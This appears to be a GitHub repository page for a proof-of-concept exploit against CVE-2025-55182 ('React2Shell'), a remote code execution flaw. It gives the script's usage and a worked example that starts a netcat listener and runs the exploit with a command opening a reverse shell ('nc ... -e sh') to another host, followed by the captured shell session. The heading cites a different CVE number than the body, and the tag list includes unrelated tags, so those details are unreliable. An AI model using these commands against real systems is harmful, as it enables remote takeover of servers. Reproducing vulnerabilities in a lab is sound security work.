masterwok/CVE-2025-55182-React2Shell-PoC
GitHub: masterwok/CVE-2025-55182-React2Shell-PoC
针对 CVE-2025-55182 (React2Shell) 漏洞的概念验证利用脚本,能够通过发送特制请求实现远程代码执行。
Stars: 0 | Forks: 0
# PoC: CVE-2026-33017
[https://nvd.nist.gov/vuln/detail/CVE-2025-55182](https://nvd.nist.gov/vuln/detail/CVE-2025-55182)
## 使用说明
```
usage: CVE-2025-55182.py [-h] --command COMMAND target
PoC exploit: CVE-2025-55182
positional arguments:
target Target hostname
options:
-h, --help show this help message and exit
--command COMMAND Command to run on target
```
## 示例
```
# 创建 docker 实例
docker run -d -p 3000:3000 ihsansencan/react2shell:cve-2025-55182
# 启动 listener
nc -lnvp 4444
# 运行 exploit
python3 CVE-2025-55182.py http://127.0.0.1:3000/ --command "nc 192.168.1.211 4444 -e sh"
# 应在 listener 中接收到 reverse shell
Listening on 0.0.0.0 4444
Connection received on 172.17.0.2 43911
uname -a
Linux f346806b6f59 6.17.0-20-generic #20~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Mar 19 01:28:37 UTC 2 x86_64 Linux
```
本项目仅用于教育和研究目的。
作者不对因误用或由本代码造成的损害负责。
标签:CISA项目, CVE-2025-55182, CVE-2026-33017, Docker, Exploit, PoC, Python, RCE, React, React2Shell, Reverse Shell, Syscalls, 反向外壳, 安全防御评估, 无后门, 暴力破解, 概念验证, 漏洞复现, 编程工具, 网络安全, 请求拦截, 远程代码执行, 逆向工具, 隐私保护